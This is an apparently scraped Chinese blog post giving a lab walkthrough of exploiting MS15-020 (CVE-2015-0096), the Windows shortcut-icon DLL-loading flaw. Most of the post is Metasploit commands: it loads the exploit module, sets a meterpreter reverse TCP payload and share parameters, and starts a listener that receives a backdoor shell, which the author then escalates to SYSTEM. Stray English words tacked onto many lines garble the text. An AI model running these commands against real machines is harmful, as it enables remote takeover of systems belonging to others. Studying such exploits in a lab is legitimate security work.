MS15-020漏洞測試

名稱:Microsoft DLL植入遠程代碼執行漏洞(CVE-2015-0096)(MS15-020)linux

瞭解:Microsoft Windows沒有正確處理DLL文件的加載,存在遠程代碼執行漏洞,經過誘使用戶打開遠程WebDAV或SMB共享上的某些文件利用此漏洞,shell

成功利用後可致使加載任意庫。Windows使用.lnk來定義文件或者目錄的快捷方式,能夠使用.CPL文件來自定義圖標。問題是,在Windows中,圖標從模塊(或者可執行文件或動態連接庫)加載。windows

事實上,.cpl文件其實是DLL文件。由於攻擊者能夠定義哪些可執行模塊會被加載,攻擊者能夠利用.LNK文件來執行任意代碼。session

實驗環境:tcp

共享主機win7:192.168.1.3 spa

入侵主機linux:192.168.1.7orm

受害者主機XP:192.168.10blog

 

打開終端輸入命令:it

msfconsole    //啓動msf(metasploit framework)io

search ms15  //搜索關鍵字相關漏洞

use exploit/windows/fileformat/ms15_020_shortcut_icon_dllloader  //漏洞利用模塊

info //查看漏洞相關信息

set payload windows/meterpreter/reverse_tcp     //設置一個反彈shell

設置好參數,設置漏洞利用模塊列表的UNCHOST和UNCSHARE

set UNCHOST 192.168.1.3  //我設置爲個人另外一臺主機地址 就是你開着共享那臺機器的地址

set UNCSHARE share       //設置共享文件的文件夾 這裏主機192.168.1.3在C盤下的share裏文件夾開啓了共享 提早建立好共享

set LHOST 192.168.1.7   //設置漏洞成功利用後後門鏈接的地址

exploit  //執行漏洞

exploit後會發現生成了幾個文件,

咱們去生成的目錄下把文件拷貝到共享主機的共享文件夾下

 

複製到共享主機後,在啓動MSF進行配置剛纔的後門進行監聽...輸入命令

1.  use exploit/multi/handler

2.  set payload windows/meterpreter/reverse_tcp

3. set LHOST 192.168.1.7

4. exploit

 

受害者訪問共享後,

成功了觸發了漏洞

能夠發現入侵者這邊彈回來了一個回話session 1,簡單點說就是一個後門,這裏我順便提了下權,能夠看見system權限。

實驗結束,下班,關門,回家。

相關文章
相關標籤/搜索